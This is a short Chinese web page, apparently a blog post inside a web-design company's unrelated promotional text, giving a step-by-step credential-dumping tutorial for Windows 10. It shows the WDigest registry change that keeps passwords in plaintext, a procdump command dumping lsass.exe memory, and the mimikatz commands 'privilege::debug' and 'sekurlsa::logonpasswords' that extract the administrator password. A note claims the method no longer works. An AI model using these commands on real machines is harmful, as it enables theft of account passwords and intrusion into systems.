重庆分公司,新征程启航
为企业提供网站建设、域名注册、服务器等服务
注:仅供参考,方法现在已不适用
成都创新互联公司自成立以来,一直致力于为企业提供从网站策划、网站设计、成都网站设计、成都做网站、电子商务、网站推广、网站优化到为企业提供个性化软件开发等基于互联网的全面整合营销服务。公司拥有丰富的网站建设和互联网应用系统开发管理经验、成熟的应用系统解决方案、优秀的网站开发工程师团队及专业的网站设计师团队。
工具:
procdump & mimikatz
实验环境:
实验主机:win10
账户密码:17位复杂密码(大小写+特殊字符+数字)
(虽然微软很早就更新了补丁来防止获取windows的明文密码,但是可以修改注册表...
使 \HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest下的UseLogonCredentiald的键值为1 即代表WDigest的密码支持明文形式保存在LSA内存中)
步骤:
使用cmd运行procdump.exe
输入:Procdump.exe -accepteula -ma lsass.exe lsass.dmp
使用cmd运行mimikatz.exe
输入:privilege::debug
sekurlsa::logonpasswords
在wdigest:下显示的就是管理员的密码
补充:
如果按照网上的教程在mimikatz输入指令这里100%报错
(ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005))
privilege::debug(提权)
sekurlsa::logonpasswords(抓密码)